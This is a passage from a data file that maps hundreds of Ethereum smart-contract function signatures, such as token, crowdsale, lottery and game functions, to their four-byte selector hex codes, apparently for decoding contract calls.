"0x32d05c6d", "mortgage(address)": "0xd09119b4", "setFundAccount(address)": "0x6b1bfd33", "XPAAssets(uint256,address,address,address)": "0x66663d78", "isRepresentor(address)": "0xcc9a31a7", "assignAgent(address)": "0xa46c792c", "assignBank(address)": "0x20e979b1", "assignOperator(address)": "0x84385c6f", "powerSwitch(bool)": "0xdd1219fd", "Authorization()": "0xc15e61c0", "random(uint256,uint256)": "0xa9dd1225", "getAssetToken(uint256)": "0x11f1507e", "getAssetLength()": "0xa501553e", "createToken(string,string,uint256)": "0x5b060530", "getPrice(address,address)": "0xac41865a", "getDefaultExchangeRate()": "0xe0da4abd", "BurnGas()": "0x2882ab48", "GetGameType(address)": "0xc0cd54c6", "BuyItem(uint256)": "0x884c6440", "GetItemInfo(uint256)": "0x9b49413c", "GetJackpots()": "0x7ea074b3", "GameStart()": "0x4cf2e2dc", "DevForceOpen()": "0x09d64774", "ServiceStation()": "0x52fd2c15", "GetByte(uint256,uint256)": "0x1190516d", "GameState()": "0x3bbf41d9", "Next(bool)": "0x09d77ad3", "_lowerDown(uint256,address)": "0x8eef059e", "distributeContest()": "0x71882ab0", "_registerContributors(uint256,address)": "0xeaaf2489", "_ownersTokens()": "0xf6c50d8b", "_icoTokens()": "0xb1ca3b3a", "refillTokens(uint256)": "0x7ef5b6ea", "ALUXToken(uint256,string,string)": "0xeb91b5ac", "CoXxMoXx()": "0x7a3aa8ea", "CSStoken(uint256,string,string)": "0xce0ff8d8", "MRCCToken(uint256,string,string)": "0x78d55ac1", "AK47Coin()": "0x04f65288", "EtheropolyShrimpFarmer(address)": "0x8bf62f14", "AcceptsEtheropoly(address)": "0x27cda9d5", "create(string,string,uint8,uint256,address,uint256,uint256,uint256)": "0xfe972054", "RefundCrowdsaleFactory(address)": "0xda05f535", "getParam(uint256)": "0x99f65122", "numParameters()": "0xd14192ba", "ERC223MintableToken(string,string,uint8,address)": "0xb202a9f4", "TripBitToken()": "0xc8e11521", "MithrilArrows()": "0xf7aa4e0e", "GoalReached()": "0xf30bb8af", "TOKKA()": "0xe1ea0a57", "getMaxProfitAsPercentOfHouse()": "0x1ee392c6", "getHouseEdge()": "0x4cf4a292", "getTotalBets()": "0xa3cb679d", "getcontractBalance()": "0x8e4d5053", "setNonce(uint256)": "0xf360c183", "playerRollDice()": "0xe044c47f", "GetRandomNumber()": "0xfb8c7420", "MyDice()": "0xd153d118", "getDev()": "0x09bb9267", "getWinnerTeam()": "0xde7a5956", "getNumberOfBets()": "0xf222d0b9", "getTotalPrize()": "0xadeaa851", "getPools()": "0x673a2a1f", "getMyBet(uint256)": "0x508bb866", "updateStartTimeManually(uint256)": "0xa88fa4b4", "updateEndTimeManually(uint256)": "0x951b73b1", "setWinnerManually(uint256)": "0x31ca6b67", "Better(uint256,uint256,uint256)": "0x38b3e983", "EGYPT()": "0x8e1f0614", "Karma(address,address)": "0x3de4ca9e", "AhooleeTokenPreSale(uint256,uint256,address,address,uint256,uint256,uint256,uint256,uint256)": "0xffcdcb51", "AhooleeToken()": "0x3e18117a", "Shefo()": "0x6994436e", "PricingStrategy(uint256,uint256,uint256,uint256,uint256,uint256)": "0xcd1a5cad", "TobkaCoin()": "0xbe63f7b1", "TREETOKEN()": "0x42cffda9", "OptionToken()": "0xc48a0dc0", "transferWithAllowance(address,address,address,uint256)": "0xdad7c095", "HFTCrowdsale(address)": "0x7cc07974", "ETH420on49()": "0x73b34271", "CloudMoolah()": "0x410bf4bf", "ForkEthereum()": "0x6886ce25", "unregisterByList(address[])": "0xeb5a458e", "registerByList(address[])": "0x600f8cfc", "KYC()": "0xa12a6bb0", "ETNToken()": "0x83ae0839", "HLCoin()": "0x07fe178b", "setFoundersPercent(uint256)": "0x25f4c703", "updateStageWithInvested()": "0x14c16f41", "clearStages()": "0x798c6e0f", "insertStage(uint8,uint256,uint256,uint256)": "0xf88a742b", "changeStage(uint8,uint256,uint256,uint256)": "0xbbd46303", "removeStage(uint8)": "0xb27b7dd1", "addStage(uint256,uint256,uint256)": "0xd13782a7", "stagesCount()": "0x3806422a", "transferAndDonateTo(address,uint256,address)": "0x0f917e31", "changeDonation(address)": "0x3f06e17c", "donationTo(address)": "0xd416efdb", "_reAdjustDifficulty(uint256)": "0x25a583a3", "merge(uint256,bytes32,address[])": "0x07dd8e3b", "ICOBank()": "0x83e7f347", "UpgradeSpaceETH(uint8,uint256)": "0x7eb4b376", "UpgradeSpace(uint8,uint16)": "0x4c780596", "SpaceWar()": "0x3e129967", "Sk8coin()": "0xbf3e67eb", "removeLockFund(address)": "0xd945799f", "setLockFund(address,uint256)": "0xf525dcf1", "removeLockFunds(address[])": "0x7e60a4bf", "setLockFunds(address[],uint256)": "0x1a1dca07", "getLockFundsReleaseTime(address)": "0x2fffb3f9", "isUnlocked()": "0x8380edb7", "BrylliteToken(address,uint256)": "0xa0bee465", "nextAssigneeIndex()": "0x4d5eceac", "entrants(uint256)": "0xe7b4e5ab", "PictureLibraryCoin(uint256)": "0x51a88a38", "RRcoinToken()": "0x9127da7e", "setBytes32(bytes32,bytes32,bytes32,bool)": "0x4e38413f", "setAddress(bytes32,bytes32,address,bool)": "0xe7b512ec", "getString(bytes32,bytes32)": "0x31477b9b", "setString(bytes32,bytes32,string,bool)": "0x0218a1c3", "getUint(bytes32,bytes32)": "0x7a6ad926", "setUint(bytes32,bytes32,uint256,bool)": "0xe9f21537", "checkId(bytes32)": "0x01fc59e1", "changeAddress(bytes32,address)": "0x2d1d9627", "registerUser(bytes32)": "0x2dc03259", "GlobalStorageMultiId()": "0xe653d5d3", "breakdown(uint256)": "0xe327a46f", "FixedSupplyToken(string,string,uint256,uint8)": "0x71d87948", "settleBet(uint256,uint256)": "0x0d2cbe13", "placeBet(uint256,uint256,uint256,uint256,bytes32,bytes32)": "0x5e83b463", "setMaxProfit(uint256)": "0xfbd668a9", "setSecretSigner(address)": "0xd702087f", "ETHERONEUM()": "0x830d77d4", "withdrawEtherToIfPossible(address,uint256)": "0xea1e74ef", "incrementOpenInterestFromMarket(uint256)": "0x061777ed", "decrementOpenInterestFromMarket(uint256)": "0x0db3be6a", "deriveMarketCreatorFeeAmount(uint256)": "0xf8c52125", "getInitialReporterAddress()": "0xc7600cde", "trustedUniverseBuy(address,uint256)": "0x7303ed18", "burnDead(address,uint256)": "0x0ff92e7b", "burnReturn(address,uint256)": "0xc0a35d62", "mintable(uint256)": "0x0f784943", "getComponents(uint16,uint8,uint256)": "0xaf9a51c6", "setCanClaim(bool)": "0xc503101e", "_getLegendaryPlusRarity(uint32)": "0x323ded4d", "_getEpicPlusRarity(uint32)": "0x822b1747", "_getRarePlusRarity(uint32)": "0xb32e02e8", "_getCommonPlusRarity(uint32)": "0x90cf72de", "calculatePrice(uint256,uint16)": "0xe3f7faaf", "predictPacks(uint256)": "0xca2bf047", "callback(uint256)": "0xff585caf", "packsPerClaim()": "0x8be4339b", "packSize()": "0x06a628d4", "getCardDetails(uint16,uint8,uint256)": "0xc2f0bb29", "basePrice()": "0xc7876ea4", "total()": "0x2ddbd13a", "_getPurity(uint16,uint16)": "0x288a6535", "purchase(uint16,address)": "0x396c8228", "combineCards(uint256[])": "0x27486a7c", "_createCard(address,uint16,uint16)": "0x86609b37", "createCard(address,uint16,uint16)": "0xfb36eba1", "_isApprovedPack()": "0xfc9f8cae", "getBurnCount()": "0xe7cf548c", "transferAllFrom(address,uint256[])": "0xf3d47d1b", "approveAll(address,uint256[])": "0xf0303452", "burnAll(uint256[])": "0x100cdd91", "_create(address,uint256)": "0x301df7ab", "replaceProto(uint16,uint8,uint8,uint8,uint8,uint8,uint8)": "0x4fb31a6a", "getProto(uint16)": "0x05c4af9d", "nextSeason()": "0xbc734f0f", "isTradable(uint16)": "0xa71aec73", "makePermanantlyTradable(uint8)": "0x1fa24aa7", "makeUntradable(uint8)": "0xc968aab3", "makeTradeable(uint8)": "0x681f8116", "getLimit(uint16)": "0x943b82f1", "setLimit(uint16,uint64)": "0x5dcbd8bb", "getShine(uint16)": "0x850e3760", "setGovernor(address)": "0xc42cf535", "batchTransfers(address[],uint256[])": "0x3badca25", "rescheduleTransaction(uint256,uint256)": "0xf23e22a7", "transactionRawToBytes(uint256,address,address,uint256,bool,bool)": "0xea439e10", "transactionStructFromBytesSeriality(bytes)": "0x8b0b8820", "performTransaction(uint256)": "0xce5c2c33", "getTransactionIdsOf(address,address)": "0x100a1099", "voidTransaction(uint256)": "0xed5ec919", "Seriality()": "0xc8159d70", "TypesToBytes()": "0x4baf7a30", "sizeOfBool()": "0x93c69927", "sizeOfAddress()": "0x331b6f66", "sizeOfUint(uint16)": "0xe2e8b978", "sizeOfInt(uint16)": "0x45734d2b", "sizeOfString(string)": "0xa5847862", "setBurnable(bool)": "0x80929e5b", "setLockRatio(uint256,uint256)": "0xbf8af541", "setLockend2(uint256)": "0x7252518c", "setLockend1(uint256)": "0xfc03c7ec", "setMinContrib(uint256)": "0xe3c10714", "getMinContrib()": "0xbf656791", "NCO()": "0xbd8d585e", "canUseLock()": "0x1f49caac", "setLockAdmin(address,bool)": "0x6e53909a", "transferWithLock(address,uint256,uint256,uint32)": "0x66e72baa", "getLockByIdx(address,address,uint32)": "0x439abc5b", "getLockListLen(address,address)": "0xb4073060", "getLockAmount(address,address)": "0x339fd959", "QuickUnionPayChain()": "0xc1b36489", "whatProposal(bytes32)": "0x3d0141f6", "isDev(address)": "0x0c3f64bf", "adminName(address)": "0xaf1c084d", "devCount()": "0xcebc141a", "adminCount()": "0x2b7832b3", "requiredDevSignatures()": "0xfcf2f85f", "changeRequiredDevSignatures(uint256)": "0x2c296656", "changeRequiredSignatures(uint256)": "0x39f636ab", "addAdmin(address,bytes32,bool)": "0x372cd183", "checkSignersByName(bytes32,uint256,uint256,uint256)": "0xed3643d6", "checkData(bytes32)": "0xa553506e", "deleteAnyProposal(bytes32)": "0x0efcf295", "startMigration(address)": "0xa0f52da0", "ethRetrieve()": "0xaa1614eb", "forceNextStage()": "0x07ef3ea1", "getLockInfo(address,address)": "0x061c9040", "DuanZiToken(address)": "0x0b936a77", "claimRemainingTokens()": "0x313602d4", "weiToCap()": "0x3305cf85", "_finalizeStage()": "0x95163f39", "isPreviousStageFinalized()": "0x4ea6c89e", "proxyBuyTokens(address)": "0xd9b25a24", "getCalFactor(uint32)": "0x91959fe3", "getCaptainIndexToCount(uint32)": "0xea9707a3", "setCaptainIndexToCount(uint32,uint256)": "0x8bb204d4", "addCard(uint32,uint32,uint32,uint32,uint32,uint256)": "0xd67d78cd", "getCardType(uint32)": "0x4da07fe5", "CaptainGameConfig()": "0x90fc2a32", "AlphaconCrowdsale(bytes32[5])": "0xe776fa22", "MintableBaseCrowdsale(address)": "0x69cbd0fe", "CoinBX(address)": "0x698c1d17", "SovTokenCrowdsale()": "0xc9e7fd4b", "Testerr()": "0x6acd89f6", "reconcileDividend(address)": "0xf50059b6", "getOwedDividend(address)": "0xef0b5420", "setAUM(uint256)": "0x8a44ae91", "addNewDividends(uint256)": "0xab92f290", "drip(address)": "0x67a5cd06", "reportProfit(int256,bool,address)": "0x079b365e", "getMult(bytes32,bytes32,uint256)": "0xe3f0dd48", "getAttack(bytes32,bytes32,uint256)": "0xe2021f66", "getDefense(bytes32,bytes32,uint256)": "0xc3380b72", "getLife(bytes32)": "0x82f0b31c", "urandom(bytes32,uint256)": "0xb4d01e87", "CatDestinity()": "0x1e2fee94", "gen(bytes32,uint256)": "0xe9de5c0f", "readValue(bytes32,uint8)": "0x26c19eba", "BitcoinElena()": "0x75c34d94", "LGTToken()": "0xd7eaef90", "NulsStandardToken(uint256,string,uint8,string)": "0xc97aae82", "sendToRstForAddress(address)": "0x6fdf9a3f", "sendToRST(address)": "0x0835e754", "moveToRST()": "0xa07fc020", "issueInternal(address,uint256,bool)": "0xfede5cc6", "setOpen(bool)": "0x6fdca5e0", "setTokensLimit(uint256)": "0xb1f5b6da", "setNotLessThan(uint256)": "0x4fc91633", "setNotMoreThan(uint256)": "0x07ae3095", "PreICOToken(address)": "0x34f50813", "applyTokens(address,uint256)": "0x521be69c", "RealstateOceanProject1(address)": "0xad3ef46d", "NRCToken()": "0xfa407c19", "OCTCOIN()": "0x56e9ae71", "OSECOIN()": "0x986d08a8", "KantrotechCoin1(string,string,uint256,uint256)": "0xc19dccd8", "proceedTokenDeals(uint256)": "0x4a4c5e59", "proceedEtherDeals(uint256)": "0x5a54cd46", "needUpdate()": "0x579da090", "Exchanger()": "0x06fd06f8", "DANK()": "0x9c73ff7d", "MyPizzaPieTokenPreSale(uint256,uint256,address,address,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x8121dbc1", "Scratch()": "0xd5dc7139", "HaoCoin()": "0x23d2b3aa", "PowerQuantumCoin()": "0x62f3ed92", "getHumanInfo(uint256)": "0x1dd7cf6d", "getHumanNumber()": "0xd8c35273", "getCardPrice()": "0xd79d63be", "getNbSellOrder()": "0x1390b247", "getSellOrder(uint256)": "0x390ce0d3", "processSellOrder(uint256,uint256)": "0xa70beb13", "createSellOrder(uint256,uint256)": "0x1df68102", "mineCard()": "0xed1ece04", "changeCardPrice(uint256)": "0x30efac4e", "addHuman(string,uint8)": "0xe242fbbb", "HumanityCard()": "0xe06a60ff", "DmlToken(address,uint256)": "0x1cd07895", "EtheRoox(address,address,address,uint256,uint256,uint256)": "0xb7e92ede", "showBlockmaticsCertificate()": "0x445f153a", "RIPAC(uint256,string,uint8,string)": "0x3913f487", "_transferHelper(address,address,uint256)": "0xe9f50b02", "setParentID(uint256,uint16)": "0xe2ae0c79", "getNumberOfCrySolObjects()": "0x30e57b67", "getOwnerNickName(address)": "0x7043ca8e", "setOwnerNickName(address,string)": "0x1dc3ac22", "buyCrySolObject(uint256)": "0x24c2362b", "_transferOwnershipOnBuy(address,uint256,address)": "0xbb850e01", "returnDevelopersCut(uint256)": "0xf8e48488", "getAllCrySolObjects()": "0x8639ae69", "getCrySolObjectsByOwner(address)": "0x74914710", "createCrySolObject(string,uint256,uint16,uint16,uint8,uint8)": "0xaacec70b", "Hello()": "0xbcdfe0d5", "Initialize()": "0x80f86009", "UpdateInitiateContractAddress(address)": "0x856b3108", "CreateLand(uint256,address)": "0x11c3fec5", "createCity(uint256)": "0x57230ff8", "rentLand(uint256,bool,uint256)": "0x6a91205a", "purchaseLand(uint256,uint256,uint256)": "0x7cc4ef14", "updateLand(uint256,uint256,uint256,uint256)": "0xd32a7ee0", "purchaseBuilding(uint256,uint256,uint256)": "0x68d5cb1a", "getProductionTimeBusiness(uint256)": "0x409bd95b", "purchaseMetal(uint256,uint256)": "0x1353e7b3", "updateBusiness(uint256,uint256)": "0x3609bf09", "createBusiness(uint256,uint256,uint256)": "0x463ee88a", "removeTenant(uint256)": "0x7dd2e993", "getCountCities()": "0xf5e7ef7a", "getMaxBusinessesPerCity(uint256)": "0x5ae61377", "getProductivityCitizens(uint256)": "0x3c237167", "getHappinessCitizens(uint256)": "0x8759c2f1", "getEducationCitizens(uint256)": "0x8a359d6e", "getHealthCitizens(uint256)": "0x37072ec7", "getSalesCity(uint256)": "0x75dc6471", "getActiveBusinessesPerCity(uint256)": "0x827d084a", "NULL_ENCRYPTION_ALGORITHM_ID()": "0x2be6ec1f", "newTokenWeiPrice()": "0xa55cc1cc", "lethalBonusAtHitsLead()": "0x2090f3e3", "lastDistributedAmount()": "0x81904676", "battleContractAddress()": "0x67e54367", "MAINSALE_CAP()": "0xb2aa8291", "purchase_address()": "0xf023d600", "payOutPercentage()": "0xb1321ed7", "HARD_CAP_T()": "0x68bba4d0", "rightSharePriceRateOfIncrease()": "0x1290a2b4", "overdraftUnvested()": "0xa84f3e5a", "icoCompleteB()": "0x34556035", "endTGE()": "0x54b48428", "ownerClawbackCredits()": "0x06771000", "newUserReward()": "0x8b57f150", "devfeesoutstanding()": "0xefea835a", "etherDelta()": "0xd67a10e3", "holderBountyTokens()": "0x69f66950", "get_parameters()": "0x53e4e607", "totalCommunityFundMinted()": "0xf3b75ee3", "inVaults()": "0x41326679", "lastUETCWC()": "0x17cc4138", "debug2()": "0x5ba88c28", "startDateOfUseTeamTokens()": "0x37ec33b7", "RATE_WHOLESALE()": "0xa5d68bfd", "totalLBSold_PRIVATE()": "0xcca5020b", "hard_cap_wei()": "0x8173e363", "owner_time_limit()": "0x9e7fec98", "uniq(uint128[])": "0xed9da760", "soldBeercoins()": "0xa70284be", "migrationDone()": "0x0d81a570", "walletFees()": "0x666efa0a", "Show_Address_for_option_C()": "0xa6e5f2f5", "presale1_startdate()": "0x26843251", "preicoPrice()": "0xe0539225", "RELEASE_START()": "0x8ea77300", "onlyDevs()": "0xa78118a4", "tokenRateUsd()": "0x9e76e30d", "minBuyPrice()": "0x16fcdb84", "Wallet4()": "0x9c561a42", "getGodAddress()": "0x6f74dafe", "endBookings()": "0xe6dd9a8d", "founderFund()": "0x75071c4c", "orgName()": "0x1386dc2d", "registrarAuth()": "0xb90ae5a1", "maxContributionPhase2()": "0x931a4c5b", "shareTime()": "0x4b3985a4", "allocate7ProjectToken()": "0xb407d1d2", "totalLosts()": "0xf5fc58c4", "Rate1()": "0x3bf12c88", "totalYUPIESAllocated()": "0x6d029f6a", "RANGESTART_1()": "0xe9085957", "ContractAddress()": "0x66d11c1a", "ETH_Rate_Factor()": "0xd84cb6ad", "UNLOCKINTERVAL()": "0x4f75e930", "getCollateralBalance()": "0x1529a639", "reservedSaleEther()": "0x11d36bf5", "minimumICOCap()": "0x80af6002", "bids_ignored_refunded()": "0xe93ab977", "rlc_reserve()": "0x1712649b", "adminPayout()": "0xb560c4de", "TOTAL_CONTRIBUTOR_COUNT()": "0x72adcadd", "currChampion()": "0xba3fd8f7", "isAdvisorsTokensThirdReleased()": "0xb991357c", "generateFinished()": "0xa13d8ec4", "exchangeLimit()": "0xd717b05e", "requestRandom()": "0xda9f7550", "crowdfundPercentOfTokens()": "0x574e9063", "minValuePre()": "0xa75439d1", "ownerWithdrawRune()": "0xcc10145f", "publisherMessage()": "0xed84115e", "audit()": "0x1ddc0ef0", "mintCapInTokens()": "0x7a63c290", "afterFirstRefundRoundFundsReleaseDenominator()": "0x66dacc48", "preSaleTokens()": "0x0fe83bb8", "maximumTarget()": "0x269714dd", "ETHER_HARD_CAP()": "0xe62cc611", "SALE_STEP()": "0x84b9a4a5", "CurrentIceDelta()": "0x5c796720", "MLB_Legal()": "0x42c81f45", "satellite()": "0xa2a9a6c1", "sell_id()": "0x9d4c662c", "ASSET_MANAGER_WALLET()": "0xb3feda02", "landClaim()": "0x90b06593", "rateStage3()": "0xcc41a396", "amountInContract()": "0xd3456121", "beneficiaryTwo()": "0x1bff4bfa", "sponsoredBonusToken()": "0xe0f8da97", "initialBlock()": "0x2cb15864", "cstToMicro()": "0x23c32d74", "priceOfAUnicornInFinney()": "0x50c34878", "enableCharity()": "0xab21d58a", "ownerPerThousandShareForMating()": "0x36471908", "_soldOutsidePMZ()": "0xa00f64d6", "max_amount()": "0x1a34fe81", "addressA()": "0xfd4e4d75", "admin1()": "0x115976c4", "TUI_ADDRESS()": "0x768356c1", "TIER_3_BUYIN()": "0x0e2dc949", "icoPhaseAmount4()": "0x069215c9", "ownerSelfDestruct()": "0xd38c3253", "ownerSetRate(uint256)": "0xcf9faf1d", "ownerSetWallet(address)": "0x96102d7d", "ownerSetOwner(address)": "0xad8a9c8e", "ownerTokenTransfer(address,uint256)": "0x901da0df", "YeedToken(uint256,address)": "0x1da55b9f", "Lockable()": "0x731b3284", "cancelTx(uint8)": "0xe5bb9fb9", "ThreesigWallet()": "0x16fd48a1", "Marine()": "0xf2ba31ea", "Bitcash()": "0x3b5ae589", "RRROToken()": "0x381f4b9e", "SGD_Omnidollar()": "0x602501a1", "GILToken()": "0x1edb0e73", "STARTToken()": "0x4f6c87fb", "transferAll()": "0x051f4f6f", "changePrice(bool)": "0x9078b596", "SolarNA(address[],uint256[])": "0x4852e54b", "DuqueBrewingCompany()": "0x67a26cbc", "getData_34()": "0xd9fefb93", "setData_34(string)": "0x9a7394f5", "getData_33()": "0xece5ca56", "setData_33(string)": "0x93d087a2", "getData_32()": "0x5bebe2c6", "setData_32(string)": "0xeefb9538", "getData_31()": "0xcd997aa3", "setData_31(string)": "0x898dc9b6", "getData_30()": "0xd43c3bb9", "setData_30(string)": "0x4931b3b4", "getData_29()": "0x823506af", "setData_29(string)": "0x99497349", "getData_28()": "0xe8853e32", "setData_28(string)": "0x7ff31d2b", "getData_27()": "0x16e33aa2", "setData_27(string)": "0x98a7cafd", "getData_26()": "0x14a7c57d", "setData_26(string)": "0x521b601a", "getData_25()": "0x8eb857f8", "setData_25(string)": "0xef6f1f36", "getData_24()": "0xe9bd97dc", "setData_24(string)": "0xad976c3e", "getData_23()": "0x3c1650ff", "setData_23(string)": "0xb0abbc7b", "getData_22()": "0xf3d2f17b", "setData_22(string)": "0x5faeb944", "getData_21()": "0x43eb5ac7", "setData_21(string)": "0x929de7c9", "getData_20()": "0xdaf9a535", "setData_20(string)": "0xa5b222c9", "getData_19()": "0x84885ed6", "setData_19(string)": "0x709f6f25", "getData_18()": "0x2d1f0097", "setData_18(string)": "0xf98c48c1", "getData_17()": "0x384bb70b", "setData_17(string)": "0x06d83296", "getData_16()": "0xb3cba833", "setData_16(string)": "0xabdf9566", "getData_15()": "0x93c38965", "setData_15(string)": "0x831aab01", "getData_14()": "0xc219d326", "setData_14(string)": "0x500d22db", "getData_13()": "0x7dd15d40", "setData_13(string)": "0x5ed6a8e7", "getData_12()": "0x97ff5be4", "setData_12(string)": "0xd51c86e7", "getData_11()": "0xeef80bbc", "setData_11(string)": "0xca414006", "getData_10()": "0x466f0004", "setData_10(string)": "0x3c358483", "getData_9()": "0x684ecd59", "setData_9(string)": "0xeab15085", "getData_8()": "0x506d9ebd", "setData_8(string)": "0x888419ed", "getData_7()": "0x73be0a99", "setData_7(string)": "0xfc236188", "getData_6()": "0xdaf760d0", "setData_6(string)": "0xdd0e3902", "BIMI_DAO_31_a()": "0xe98444e8", "Lizambo()": "0x88482233", "transferToInternalLedger(uint256,bytes32)": "0x2168c988", "treasuryBalance()": "0x313dab20", "transferTreasury(address)": "0xd8a6021c", "WestCoin()": "0x10519ff4", "batchDoubleBalances(address[])": "0xadc06ccd", "doubleBalances(address)": "0x08c9ac21", "checkDouble(address)": "0xc6af3166", "BOXSToken(address,address,int256)": "0xd86c31e5", "MyCash()": "0x8421ec8a", "readMarketplaceConfigs()": "0x13afa97a", "readUserPurchasedToday(address)": "0x43090357", "readGlobalPurchasedToday()": "0xa1988458", "readUserPurchaseAtIndex(address,uint256)": "0xf6c3f6cd", "readPurchaseAtIndex(uint256)": "0xf3169506", "readTotalNumberOfUserPurchases(address)": "0xc7d128d1", "readTotalNumberOfPurchases()": "0xec480557", "availableDgxNg()": "0x1ba60f9b", "userMaximumPurchaseAmountNg(address)": "0xde089aee", "getUserInfoAndConfig(address)": "0x1e49d5ab", "identity_storage()": "0xc70ad05b", "MarketplaceInformation(address)": "0x80999cc0", "bigRoundMaxRoundNum()": "0xcaf66171", "FreezeTokens()": "0xee5e2988", "sumICOStage4()": "0x4541e154", "theWinner()": "0x9d24e482", "grantTeamToken()": "0xaecadd53", "PutEther()": "0xc039d6db", "fundingUnlockPeriod()": "0x9ea03ccb", "UTCStop()": "0x8bf13a30", "notesLength()": "0xdc6b9b29", "DISCOUNT_PRIVATE_PRESALE()": "0xd55b9f4d", "maxcap()": "0x55456f58", "newEnglandBets()": "0x108fa161", "toggleIsLive()": "0x749555cd", "nearestKnownBlockHash()": "0x2f7a163b", "weiRaisedICO()": "0xb1fe1b4a", "tokenPresaleCap()": "0x758befae", "referrerLevel1Percent()": "0xc171fb91", "violaToken()": "0x78a83232", "ApexTalk()": "0x635ba8a1", "bonusIncreasePercentage()": "0xaf77040e", "dividends()": "0x35d97405", "setProductCompletionDate()": "0x722d1d13", "systemSaleAddress()": "0x7fb0a445", "CREATE_NAME_ROLE()": "0xfef47e38", "categoriesCount()": "0xb7ccc466", "AirdropBeggarsCommunity()": "0x5aee1bc0", "timeToBeBurned()": "0xb5389c20", "burnFormula()": "0x823ba0b8", "sellCeiling()": "0xbb7fa4ac", "buy50()": "0xda5b1f5c", "toekensForOthers()": "0x72fd8772", "totalFeatures()": "0xd94288de", "minSecondsBetweenPublishing()": "0x64afcf2e", "fundcruVaultLockTime()": "0x602e496c", "ICOTokenHardCap()": "0x2d21ca88", "setFounder()": "0x64994978", "fetchUndistributedProfit()": "0xb9599f3a", "foundersVestedPayment()": "0xbbb0c054", "getDSTNameBytes()": "0x467ed261", "FirstTimeTransfer()": "0xefc82381", "gracePeriodMaxTarget()": "0x1a21c229", "paidversion()": "0xf457361a", "icoPhase2Start()": "0x2ac110c5", "TEAM_UNFREEZE()": "0x0a4c6a45", "payto3()": "0xa27ee939", "maxPerPersion()": "0x41831218", "Tier_Classic()": "0x9cd4fb47", "ltc()": "0x5aea5955", "minFundingReached()": "0xd34b1537", "MAX_UINT256()": "0x33a581d2", "stageThreeCap()": "0xeee3c4c9", "MINE()": "0x5061029d", "softCapOk()": "0x7dbd0139", "confirmedTimesByOwners()": "0x9fda5ad2", "minAllowedBetInEth()": "0xcfaed1e2", "ONE()": "0xc2ee3a08", "walletUserCount()": "0xfe14b085", "XferMoneyTeamAddress()": "0xcd550cc8", "showOwner()": "0xded94688", "periodPreITO_period()": "0xf0c5a46b", "TotalFunds()": "0x7b9a3f4c", "secretSigner()": "0x4d61537f", "expirationCheck()": "0x6a1b52e1", "ownerTokensAllocated()": "0xd7182850", "deathData_f8()": "0x03ac58d7", "artDescription()": "0x28b5e965", "Group_4()": "0x5a8bbee1", "endICOStage6()": "0xace45552", "teamPeriodsNumber()": "0xabadeb06", "supportRebalance()": "0xad03261e", "minimumContribution()": "0x937e09b1", "selfRegisterDIN()": "0xa14ea9c0", "etherwow()": "0x7fe38fc3", "firstUnitStartTime()": "0x7a8a8720", "allocateFoundationToken()": "0x2ee8dda9", "_raised()": "0xf5ac6319", "reCommentReward()": "0x4ad8c869", "endICOStage2()": "0xebc6a661", "horses()": "0x43bddf40", "RESERVED_UTILITY_GROUP()": "0xdafd70c9", "futureHolder()": "0xa305ac76", "masterCut()": "0x7258b901", "rocCoreAddress()": "0x7354eb04", "saleStopped()": "0x456c8cac", "numElementsEven()": "0x38b5e0fe", "useDELEGATECALL()": "0x95578ebd", "nextDiscountTTMTokenId1()": "0xec28118e", "marketingTokenAllocation()": "0x3a6a43f4", "hPayMultiSig()": "0xeb0207e3", "votedNo()": "0x1187d66e", "sec_addr()": "0xf634bd29", "mintcoin()": "0x30b7222f", "bonus3Ends()": "0x48560630", "getMinAuditPriceSum()": "0xe51949fb", "allowPublicTransfer()": "0x39895801", "quarter3()": "0x8a5cf5ee", "gameType()": "0xbbdc02db", "burningMansCount()": "0xbed230d0", "addrMine()": "0xe872a05e", "RECORDPart()": "0xad0767bd", "changeMinCapUSD(uint256)": "0xb9384f12", "CevacToken(uint256,uint256)": "0x9cd08bae", "CryptoJade()": "0x646f2942", "PASS()": "0xcfbbbd9e", "GoneTrippinToken()": "0x56078480", "_purchaseTokens(uint256,address)": "0x349a6edb", "PO24()": "0x0fc66f45", "FRUT()": "0x3cbec314", "CopyrightExchangeToken(uint256,string,string)": "0xa581ff0e", "SmartCoinCash()": "0xff7835bf", "BrinkzToken()": "0x0035ceb1", "claimGrant(bytes32)": "0x71e3c76e", "createGrant(bytes32)": "0x1e829230", "clearSaleSharesSold(uint256)": "0x1a24befc", "setSale(uint256,uint256,uint256,address)": "0xe73995cd", "PDP()": "0x37b5dce4", "CappedBurnToken(uint256)": "0x57712f37", "transferMany(address[],uint256[])": "0xb7fc6612", "removeAuthority(address)": "0xd544e010", "addAuthority(address)": "0x26defa73", "_0xTestToken()": "0x3c347cbd", "FUTM()": "0xe468cb72", "EOSPlusToken()": "0x2dbe713d", "ADPay()": "0x2a845b9f", "setReleaseMake(uint256,bool)": "0x7e3ef935", "setReleaseCar(uint256,bool)": "0xa1d707a3", "addCar(string,address,uint256,uint256,uint256,bool)": "0xeacd2ff3", "InitiateWhaleCard()": "0x443ace5b", "InitiateCars()": "0x4d908a55", "addMake(string,address,uint256,uint256,bool)": "0x15408734", "InitiateMakes()": "0xfadc0700", "setReleaseCompany(uint256,bool)": "0xbdcc809a", "addCompany(string,address,uint256,bool)": "0x380547c0", "InitiateCompanies()": "0x5ea050ec", "getMake(uint256)": "0x7a4b7075", "getWhaleCard()": "0x7294789b", "getMakeCount()": "0xd05144c8", "purchaseCompanyCard(uint256)": "0x057dd42d", "purchaseMakeCard(uint256)": "0x56820930", "purchaseCarCard(uint256)": "0x0687bb4a", "purchaseWhaleCard()": "0xfaed1922", "purchaseMakeAdv(uint256,string,string)": "0x7f1a8749", "purchaseCompanyAdv(uint256,string,string)": "0xccaaef45", "purchaseCarAdv(uint256,string,string)": "0x7859f9e6", "GetIsPauded()": "0x820c59bb", "playGame()": "0xaf899735", "getRecentActivity()": "0x88d0b42d", "getTicketOwner(int256,uint256)": "0xe67eed44", "getTicketDetails(int256,uint256,uint256,address)": "0x4d4aa77f", "getLotteryDetailsB(int256)": "0x7bf0e054", "getLotteryDetailsA(int256)": "0xe23caa06", "setMessage(int256,string)": "0xb3a1362a", "getMessageLength(string)": "0x5f8af054", "walkTowardsBlock(uint256)": "0x414e2e9e", "buyTickets(uint256[])": "0xd0fbe7fe", "EthereumLottery(address,address,address)": "0x45f03f31", "withdraw(uint256,uint8,uint16)": "0xe228a6f4", "Coffee()": "0x00a58a2a", "getMainRemainCoins()": "0x5700cb10", "getPreRemainCoins()": "0xc4d01481", "backTTCOwner()": "0x72f71894", "mainSendTTC()": "0xa1e3c008", "preSendTTC()": "0xc8aef513", 